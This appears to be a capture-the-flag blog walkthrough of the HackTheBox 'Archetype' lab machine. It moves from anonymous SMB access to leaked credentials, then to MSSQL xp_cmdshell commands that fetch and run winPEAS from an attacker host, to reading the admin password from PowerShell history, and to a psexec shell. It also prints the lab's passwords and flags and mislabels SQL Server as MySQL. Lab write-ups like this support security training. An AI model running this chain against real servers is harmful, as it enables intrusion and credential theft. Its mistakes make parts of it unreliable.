HTB Labs — Tier 2 — “Archetype” Machine Walkthrough | By: CyberAlp0

Solving Archetype Machine from HackTheBox — Starting Point — Tier 2 | By: CyberAlp0

Hey Folks, this is CyberAlp0. Back again to a new walkthrough powered by HTB, Tier 1, named “Archetype”. This machine covers some tasks that will give you a walkthrough into finally finding the flag and solving the machine.

This blog will guide you toward solving the tasks one by one and give you a little bit more information and hints regarding each question. These hints will widen your experience and sharpen your mind.

Let’s begin Spawning…

Step 1: Connecting to the Starting Point Labs Servers.

To attack the target machine, you have to be on the same network. You can read my Blog which will guide you step-by-step into connecting to the target machine.

Step 2: Spawning the Machine and Start Solving the Tasks.

Task 1: Which TCP port is hosting the database server?

Answer: 1433

Walkthrough:

By Scanning the target first, we will have a pretty good knowledge about nearly everything in the machine. There are two different scanning tools, which are the Nmap & Rustscan.

Since Nmap is my favorite, I will be using it to see the open ports and what services are running.

nmap -v 10.129.95.187

Discovering the open ports in the target

You can also run the Nmap to detect the version names (-sV) and the default set of scripts (-sC).

nmap -sC -sV 10.129.95.187

Discovering the open ports in the target

You shall notice that the database used is MySQL database of version 2017. and it is operating on a TCP port 1433.

Note That: the Default TCP port for MySQL is 3306.

Task 2: What is the name of the non-administrative share available over SMB?

Answer: backups

Walkthrough:

Since the server has an open port of 445, this means that the server is likely vulnerable to the SMB “Server Message Block” which gives any attacker inside the network to scan and list for the shared files or devices such as printers.

To exploit this vulnerability, we will be typing the following command

smbclient -L 10.129.95.187

Listing the shares inside the server that has an open port of 445.

We will notice that there are 4 shares inside the server. All the shares that end with the “$” sign, mean that these are administrative shares. No one will be able to access or view what is inside them without permission. Hence, the only share that can be accessed without passwords is the “backups” share.

Note that : A share is a local resource on the server that is accessible to the SMB clients on the network. A share is a directory. It is used to provide a network access to the home directories on a network file server. Each user is assigned to a home directory.

How SMB is exploited?

We have Discussed more about the SMB in the “DANCE” Machine. You may find more information about exploiting SMB through this blog.

Task 3: What is the password identified in the file on the SMB share?

Answer: M3g4c0rp123

Walkthrough:

By making use of the available workshare named “backups”, we will exploit the opened port of 445 and connect & list the connected Shares/Devices in the network by typing the listing command using the smbclient.

smbclient --no-pass //10.129.95.187/backups

Connecting to the backups shares by exploiting the SMB

By making use of the GET command we will be able to download the file named as “prod.dtsconfig”. By viewing what’s inside this file we will be able to see that password.

The Password identified in the file prod.dtsconfig

Task 4: What script from Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?

Answer: mssqlclient.py

Walkthrough:

First of all, we need to understand the meaning of the Impacket collection. Impacket collection is a set of scripts and libraries that are written in Python. Impacket collection provides a wide range of functionalities for working with network protocols, and penetration testing.

Impacket was developed by Core Security Technologies. These bunch of scripts and libraries allow users to interact with network services and perform security-related tasks like implementing network protocols like SMB, LDAP , and Kerberos.

Note that: Impacket scripts and libraries are open source and can be found in GitHub. But it is already preconfigured in your latest kali Linux.

In the Impact Collection, the script that will be used to establish authentication with the Microsoft SQL Database is “mssqlclient.py”. It is a Python script that allows connecting to a Microsoft SQL server and executing SQL queries.

impacket-mssqlclient <hostname/ID>@IP -windows-auth

You will find the hostname or the ID in the prod.dtsconfig. The ID=ARCHETYPE/sql_svc & The password=M3g4c0rp123

Connect to the server using the Impacket mssqlclient.py command as follows:

impacket-mssqlclient ARCHETYPE/sql_srv@10.129.138.22 -windows-auth

You will be asked to enter the password, just copy and paste the password and press enter.

Connecting to the Archetype SQL database through an impacket script called mssqlclient.py

Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?

Answer: xp_cmdshell

Walkthrough:

In Microsoft SQL Server, the extended stored procedure that can be used to spawn a Windows command shell is called “xp_cmdshell”.

What is meant by an extended stored procedure?

It is a feature in Microsoft SQL Server that allows the users to create and execute functions. These Functions take part in extending the functionality of SQL server by integrating other programming codes like C# & C++

“xp_cmdshell” is considered one of these built-in extended stored procedures. It gives you the ability to execute commands on the operating system level from the SQL server itself. it gives you also the ability to interact with the Windows Command Line CMD and execute commands.

Bottom of line: xp_cmdshell is a stored procedure feature inside SQL servers. when using it, it will be like a channel between you and the windows operating system. You will be able to execute windows power shell commands through it.

How xp_cmdshell works, and how it is exploited by hackers?

To make use of the xp_cmdshell, You will be prompted to enable the feature. Enabling it will give you the ability to execute commands on the OS level.

enable_xp_cmdshell

Enabling the xp_cmdshell. It is now turned from 0 to 1

To make sure everything works fine, try to execute a windows shell command like whoami and see the result.

The hacker is now logged in as a normal user.

Task 6: What script can be used to search possible paths to escalate privileges on Windows hosts?

Answer: winPEAS

Walkthrough:

When Executing the “whoami” command using the xp_cmdshell, we have realized that we are logged in as a normal user. Thus, we need to escalate the privileges from a normal user to a more powerful user.

Walkthrough into using winPEAS for escalating privileges:

Firstly: Download the Windows Privilege escalation awesome scripts (winPEAS) through this link on GitHub. Install it as shown in the following screenshot.

Installing winPEAS from GitHub

You can download the release pages that contains the winPEAS script that will be transferred and executed to the target machine through this link.

The file we want to download and transfer to the target machine is winPEASx64.exe

Secondly: Transfer WinPEASx64.exe to the target machine

WinPEAS.exe is a script that is used to escalate the privileges from normal users to admin users. Thus, we will be trying to move this script to the target machine and execute this script to escalate the privileges.

By using the wget command to download the script, we can move this script to the Apache2 server of the Kali Linux that is located in the following path /var/www/html.

Using the wget command to download the winPEAS script.

Copying the script to the /var/www/html Directory and initiating the apache2 server

Now, the script can be downloaded through typing the following link in any browser http://10.10.14.66/winPEASx64.exe

We will use the xp_cmdshell to upload the script using the PowerShell into the target machine. Then, we will use the PowerShell to execute this script.

Thirdly: Use xp_cmdshell to download the script on the target machine and execute it.

Step 1: Printing the Working Directory

xp_cmdshell "powershell -c pwd"

Printing the working Directory to see where we are in the Windows SQL Server.

Step 2: Listing what’s inside the Directory C:/Users/public

xp_cmdshell "powershell -c dir C:/Users/Public"

This is the path in which we will upload our winPEAS.exe.

Step 3: Downloading the winPEASx64.exe using the PowerShell

xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe"

Downloading the winPEASx64.exe script in the path C:/Users/Public

You will notice the following error “NotSupportedException”:

wget : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet

Explorer’s first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.

To solve this issue, You will have to specify the output for the script that will be downloaded, along with its extension.

xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe -o winPEASx64.exe"

Defining the output for the script to overcome the “NotSupportedException” Issue.

Listing What’s inside the path C:/Users/Public to make sure that the script is downloaded

Step 4: Executing the Script to escalate the privileges “ApplicationFailedException”

Write the following command in order to execute the winPEASx64.exe

xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx64.exe"

You shall encounter an error stats that the script “winPEASx64.exe” is not valid application for the OS platform. This can be solved by downloading the other version of winPEAS.exe which is x86.

Error while executing the winPEASx64 script.

x86 can be executed in both OS architectures (x64 & x86). You shall find the x86 version through this link.

Downloading the x86 exe file of the winPEAS, to be executed in the target machine.

Step 5: Downloading the x86 based script on the target machine

After following the last steps in downloading the x86 version of the winPEAS, we will download the script using the following command on the target machine.

xp_cmdshell "powershell -c C:/Users/Public/; wget http://10.10.14.66/winPEASx86.exe -o winPEASx86.exe"

How the command is executed?

The winPEASx86.exe is now installed and executed successfully.

Step 6: Executing the x86-based script on the target machine

Type the following command line to execute the winPEASx86.exe in the target machine and escalate the privileges. You shall find the result of the execution process in the previous screenshot.

xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx86.exe"

How the command is executed?

Result of the Command Execution

We shall find that the path of the file that contains the administrator password is:

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

Task 7: What file contains the administrator’s password?

Answer: ConsoleHost_history.txt

Walkthrough:

By typing the following command, we will be able to list the contents of the text file that contains the admin’s password

xp_cmdshell "powershell -c cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\; type ConsoleHost_history.txt"

Or we can directly type the following

xp_cmdshell "powershell -c type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

Type command is like cat in Linux

The password of the admin is MEGACORP_4dm1n!!

Task 8: Submitting the user flag

Answer: 3e7b102e78218e935bf3f4951fec21a3

Walkthrough:

Again, we will get the help of the Impacket features. we will use a specific Python tool called “psexec” to gain access as an administrator and cat the contents or the user flag.

impacket-psexec Administrator@10.129.70.21

The IP of the machine is different as I restarted the machine

Navigate into the following path to fetch what’s inside the user flag

type C:/Users/sql_svc/Desktop/user.txt

You will find the user.txt, once you type it, you will find that the user flag is

3e7b102e78218e935bf3f4951fec21a3

Task 9: Submitting the root flag

Answer: b91ccec3305e98240082d4474b848528

Walkthrough:

You shall find the root flag in the Desktop of the administrator in the following path C:\Users\Adminsitrator\Desktop\root.txt

The User and the Root Flag

The Root Flag of the Archetype Machine is: b91ccec3305e98240082d4474b848528

Hope you enjoyed reading my blog about solving Archetype machine from HTB — Tier 2— Starting Point Phase.

See You in another write-up!